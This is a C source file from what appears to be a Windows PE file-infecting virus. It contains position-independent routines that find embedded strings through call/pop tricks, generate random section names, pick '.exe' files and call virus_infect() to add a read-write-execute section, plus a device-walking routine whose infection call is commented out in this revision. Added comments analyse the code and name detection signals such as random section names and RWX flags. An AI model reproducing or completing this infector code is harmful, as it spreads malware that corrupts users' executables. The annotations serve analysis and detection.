#include "infect.h"
//#include <stdio.h>
// Forward declarations. None of these five functions is defined in the part of
// the file shown on this page.
// NOTE(review): the two `static` prototypes need a definition in this same
// translation unit; if none exists further down they are stale -- confirm.
void *check_if_section_in_file(sec_info *file, sec_info *section);
void *check_if_file_in_file_list(sec_info *fileList, sec_info *file);
static void add_to_ret_list(sec_info *retBase, sec_info *newFbase);
static void merge_sec_lists(sec_info *retFbase, sec_info *addFbase);
sec_info *infect_build_sec_name_struct(pids *pids);

//void print_list(sec_info *list);

// File-scope pointer with external linkage, initialised to NULL. No function
// visible on this page reads or writes it.
sec_info *si = NULL;
/*
 * Build the 8-byte name that infect_callback() passes to virus_infect()
 * (presumably a PE section name, given the IMAGE_SCN_* flags passed with it).
 *
 * Returns a buffer obtained from pic_malloc(8). Nothing in this function
 * releases it, and when the loop runs all 8 bytes are filled, so the result
 * carries no NUL terminator.
 *
 * Analyst note: names produced by the loop are 8 bytes drawn at random from
 * [a-zA-Z.0-9]. A random-looking 8-character section name is a useful static
 * triage signal, particularly together with the read+write+execute flags
 * requested in infect_callback().
 */
char *infect_gen_sec_name() {
    char *charBytes, *oldSName;
    int rand;

    // call/pop idiom: `call post` pushes the address of the bytes that follow
    // it (the embedded string table) and jumps over them; `pop` then loads
    // that address into charBytes. The data is located at run time from the
    // code's own position instead of through a relocation.
    //
    // Table layout: 63 characters (26 + 26 + '.' + 10 digits) plus the NUL
    // terminator at index 63, then "CCCCCCCC" starting at offset 64.
    __asm__("call post;\r\n"
            ".string \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.1234567890\";\r\n"
            ".string \"CCCCCCCC\";\r\n"
            "post:\r\n"
            "pop %0;\r\n"
            :"=r"(charBytes)
            :
            :);
    // Disabled alternative; note that offset 63 is the terminator of the first
    // string, not the start of "CCCCCCCC".
    // oldSName = charBytes + 63;
    oldSName = pic_malloc(8);
    rand = pic_gen_random(10);
    // For draws below 5 the buffer is returned exactly as pic_malloc() produced
    // it; whether pic_malloc() zeroes memory is not visible here.
    if (rand < 5) return oldSName;
    for (int i = 0; i < 8; i++) {
        // This NUL is overwritten by the unconditional store at the end of the
        // iteration, so the branch has no lasting effect on the result.
        if (0 != i
            && oldSName[i-1] == 0) {
            oldSName[i] = '\x00';
        }
        // NOTE(review): if pic_gen_random(64) can return 63, the byte picked is
        // the table's NUL terminator -- confirm the helper's range.
        rand = pic_gen_random(64);
        oldSName[i] = charBytes[rand];
    }
    return oldSName;
}
/*
 * Return a run-time code address computed from this function's own location.
 *
 * `call nIns` pushes the address of label nIns (the instruction right after
 * the call) and `pop` reads it back into idp; the result is that address plus
 * ID_OFFSET bytes.
 *
 * NOTE(review): the name suggests the result is meant to be the address of
 * infect_callback(), which follows this function in the source. That only
 * holds if exactly 12 bytes separate nIns from the next function in the
 * emitted code, which depends on compiler and options; nothing here checks it.
 */
void *infect_callback_ptr() {
    void *idp;

    __asm__("call nIns;\r\n"
            "nIns:\r\n"
            "pop %0;\r\n"
            :"=r" (idp)
            :
            :);
    // Macros are not scoped to the function: ID_OFFSET stays defined for the
    // rest of the file, and infect_devices_ptr() repeats the same definition.
#define ID_OFFSET 12
    // Arithmetic on void * is a GNU extension that steps in single bytes.
    return (idp+ID_OFFSET);
}
/*
 * Per-file callback. Returns the number of files infected by this call:
 * 1 when virus_infect() returns anything other than -1, otherwise 0.
 *
 * path     - path of the candidate file.
 * pathLen  - length of path; used to index its last four characters.
 * fileAttr - not used in this function.
 *
 * Analyst note: the section added through virus_infect() is requested as
 * readable, writable and executable at once. Sections that are both writable
 * and executable are uncommon in normally linked binaries, so that flag
 * combination on an unexpected section is a practical detection signal.
 */
int infect_callback(char *path, int pathLen, dir_list *fileAttr) {
    char *exeString;
    void *testFd;   // declared but never used
    char *secName;
    // call/pop idiom: exeString receives the run-time address of ".exe", which
    // is embedded in the code stream. ".new00" is emitted directly after it
    // but is not referenced anywhere in this function.
    __asm__("call afterString;\r\n"
            ".string \".exe\";\r\n"
            ".string \".new00\";\r\n"
            "afterString:\r\n"
            "pop %0;\r\n"
            :"=r"(exeString)
            :
            :);
    // The name buffer is allocated before the extension test, so both
    // `return 0` paths below leave it unreleased; who owns it after
    // virus_infect() is not visible here.
    secName = infect_gen_sec_name();
    // Compares the last four characters of path with ".exe". A pathLen below 4
    // indexes before the start of path; no bound is checked here.
    // NOTE(review): pic_strcmp()'s return convention is not visible; the file
    // is skipped when it returns 0 -- confirm which case that is.
    if (!pic_strcmp(&path[pathLen-4], exeString)) return 0;
    if (-1 == virus_infect(path, secName, (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE))) return 0;
    return 1;
}
/*
 * Return a run-time code address computed from this function's own location,
 * using the same call/pop sequence as infect_callback_ptr().
 *
 * `call nIns2` pushes the address of label nIns2 and `pop` reads it back into
 * idp; the result is that address plus ID_OFFSET bytes.
 *
 * NOTE(review): presumably meant to yield the address of infect_devices(),
 * which follows in the source. The fixed 12-byte distance depends on the
 * emitted code and is not verified anywhere in this file.
 */
void *infect_devices_ptr() {
    void *idp;

    __asm__("call nIns2;\r\n"
            "nIns2:\r\n"
            "pop %0\r\n"
            :"=r" (idp)
            :
            :);
    // Identical redefinition of the macro already defined in
    // infect_callback_ptr(); the preprocessor accepts it because the
    // replacement text matches.
#define ID_OFFSET 12
    // Arithmetic on void * is a GNU extension that steps in single bytes.
    return (idp+ID_OFFSET);
}
/*
 * Walk the list returned by pic_get_devices() and call message_box() with
 * each entry's fName. Always returns 0.
 *
 * In this revision the pic_get_paths_callback() call is commented out, so icb
 * is computed but never used and no per-file callback is started from here.
 */
int infect_devices() {
    dir_list *dev, *devCur;
    void *icb;

    icb = infect_callback_ptr();

    dev = pic_get_devices();
    devCur = dev;
    // dev is dereferenced without a NULL check. The loop stops at the node
    // whose next is NULL without processing it.
    // NOTE(review): that is either a sentinel tail or a skipped last entry;
    // the list shape produced by pic_get_devices() is not visible here.
    while (devCur->next) {
        // pic_get_paths_callback(devCur->fName, icb);
        message_box( devCur->fName);
        devCur = devCur->next;
    }
    return 0;
}